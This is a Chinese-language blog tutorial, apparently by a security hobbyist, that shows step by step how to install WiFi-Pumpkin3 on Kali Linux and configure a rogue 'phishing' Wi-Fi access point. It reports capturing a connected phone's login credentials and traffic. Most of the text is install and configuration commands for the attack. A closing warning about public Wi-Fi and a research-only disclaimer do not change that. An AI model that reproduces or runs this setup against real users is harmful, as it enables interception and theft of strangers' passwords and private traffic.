簡單快速搭建釣魚wifi
前言
釣魚wifi是很久的話題了,但是傳統的方法可能比較麻煩需要手動配置dhcp,dns,網絡卡,流量轉發,比較麻煩,而且還有根據每次的網路環境需要重新的配置,這裡介紹用WIFIpumpkin3工具簡單快速的搭建釣魚wifi
WIFIpumpkin3的安裝
WIFIpumpkin3依託的是python來構建dns,dhcp所以需要python環境且python環境要大於3.7,目前似乎不支援windows和mac,我用的kali上面已經集成了python3.8的環境,所以就不介紹python>=3.7的安裝了,需要的自行百度,下面的操作都是在kali2020.2上其他環境的安裝參考官方文件WIFIpumpkin3
python安裝依賴
sudo apt install libssl-dev libffi-dev build-essential
安裝git,kali中似乎已經整合
apt-get install git
下載WIFIpumpkin3
選擇合適的目錄
git clone https://github.com/P0cL4bs/wifipumpkin3.git
下載完畢進入目錄
cd wifipumpkin3
安裝PyQt5
sudo apt install python3-pyqt5
驗證是否安裝成功,如果列印了done則表示安裝成功
python3 -c "from PyQt5.QtCore import QSettings; print('done')"
編譯安裝WIFIpumpkin3
sudo python3 setup.py install
如果顯示下圖這樣就代表安裝成功了
WIFIpumpkin3建立釣魚wifi
啟動wifipumpkin3
wifipumpkin3
設定網絡卡這裡的網絡卡同樣要具備ap模擬的網絡卡,wlan0為你的網絡卡
set interface wlan0
設定wifi名稱也就是ssid,demo修改為你要建立的wifi
set ssid demo
設定代理外掛
set proxy noproxy
設定dns
ignore pydns_server
開啟釣魚wifi
start
檢視利用
這裡我們用手機連線一下,發現成功分配ip且有網路
看一下kali,這裡顯示了連線而且顯示了連線的手機的型號
繼續,我們用手機登入一個網站
看一下kali,發現抓取到了賬號密碼,而且還有流量記錄的資訊圖片等等,okwifi釣魚完成
參考文章及說明
上文從滲透的角度說明陌生ifi,攻擊者可以利用樹莓派等小型裝置放入大型的公共場所設定免費公共wifi是非常可怕的,所以提醒最好最好最好(重要的事情說三遍)不要連線陌生的wifi很容易盜取你的資訊
WIFIpumpkin3還有很多用途可以自行探索,本文參考地址:https://wifipumpkin3.github.io/docs/getting-started
最後歡迎訪問我的個人部落格:https://lmg66.github.io/
說明:本文僅限技術研究與討論,嚴禁用於非法用途,否則產生的一切後果自行承擔